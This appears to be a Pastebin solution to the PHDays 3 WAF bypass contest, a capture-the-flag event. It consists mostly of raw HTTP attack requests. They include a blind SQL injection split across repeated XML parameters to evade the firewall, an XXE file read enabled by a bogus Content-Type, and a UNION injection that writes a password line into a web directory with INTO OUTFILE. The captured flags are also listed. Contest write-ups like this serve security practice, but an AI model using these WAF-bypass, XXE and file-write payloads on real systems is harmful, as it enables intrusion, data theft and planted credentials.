Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- = PHDays 3 WAF bypass contest
- == Stage 1.
- Blind SQLi, use multiple params with the same name to bypass WAF:
- POST /api/ HTTP/1.1
- Host: 62.148.7.178
- Content-Length: 1985
- Referer: http://62.148.7.178/
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Accept-Encoding: *
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101
- Firefox/21.0
- <?xml version="1.0"?><request><search_name>
- </search_name><search_name>Kn</search_name><search_name>ig</search_name><search_name>ht</search_name><search_name>
- '</search_name><search_name>
- a</search_name><search_name>nd</search_name><search_name>
- (</search_name><search_name>or</search_name><search_name>d(</search_name><search_name>su</search_name><search_name>bs</search_name><search_name>tr</search_name><search_name>in</search_name><search_name>g(</search_name><search_name>(s</search_name><search_name>el</search_name><search_name>ec</search_name><search_name>t
- </search_name><search_name>fl</search_name><search_name>ag</search_name><search_name>
- f</search_name><search_name>ro</search_name><search_name>m
- </search_name><search_name>se</search_name><search_name>cr</search_name><search_name>et</search_name><search_name>_t</search_name><search_name>bl</search_name><search_name>
- w</search_name><search_name>he</search_name><search_name>re</search_name><search_name>
- f</search_name><search_name>la</search_name><search_name>g
- </search_name><search_name>=
- </search_name><search_name>'3</search_name><search_name>06</search_name><search_name>6d</search_name><search_name>7f</search_name><search_name>69</search_name><search_name>d7</search_name><search_name>98</search_name><search_name>70</search_name><search_name>06</search_name><search_name>8f</search_name><search_name>ae</search_name><search_name>85</search_name><search_name>21</search_name><search_name>c0</search_name><search_name>61</search_name><search_name>4b</search_name><search_name>2'</search_name><search_name>
- l</search_name><search_name>im</search_name><search_name>it</search_name><search_name>
- 0</search_name><search_name>,1</search_name><search_name>),</search_name><search_name>1,</search_name><search_name>1)</search_name><search_name>)></search_name><search_name>
- 4</search_name><search_name>9 </search_name><search_name>)
- </search_name><search_name>--</search_name><search_name>
- a</search_name></request>
- Flag #1, mysql database test, table secret_tbl, column flag:
- 3066d7f69d79870068fae8521c0614b2
- The second column contains the string /var/lib/sepolgen/1241232eerwqwa/asfgasddddd11111/flag
- == Flag 2
- Notice the content-type trick that turned WAF off
- POST /api/ HTTP/1.1
- Host: 62.148.7.178
- Content-Length: 176
- Referer: http://62.148.7.178/
- Content-Type: multipart/whatever; charset=EUC-JP
- Accept-Encoding: *
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101
- Firefox/21.0
- <?xml version="1.0" standalone="no"?><!DOCTYPE x [<!ENTITY e SYSTEM
- '/var/lib/sepolgen/1241232eerwqwa/asfgasddddd11111/flag'>]><request><search_name>&e;</search_name></request>
- == Flag 3
- 494bf6673d0f0b8fafac5b637de9a70d
- Rewrite htpasswd file via sqli, log in as winer, grab the flag
- POST /api/ HTTP/1.1
- Host: 62.148.7.178
- Content-Length: 172
- Referer: http://62.148.7.178/
- Content-Type: asdsadsa; charset=EUC-JP
- Accept-Encoding: *
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101
- Firefox/21.0
- <?xml version="1.0" standalone="no"?><request><search_name>asd' UNION
- select 'admin:XfOn8YD6hQ.NU' into outfile
- '/var/www/thirdstage/winnerpwd' -- a</search_name></request>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement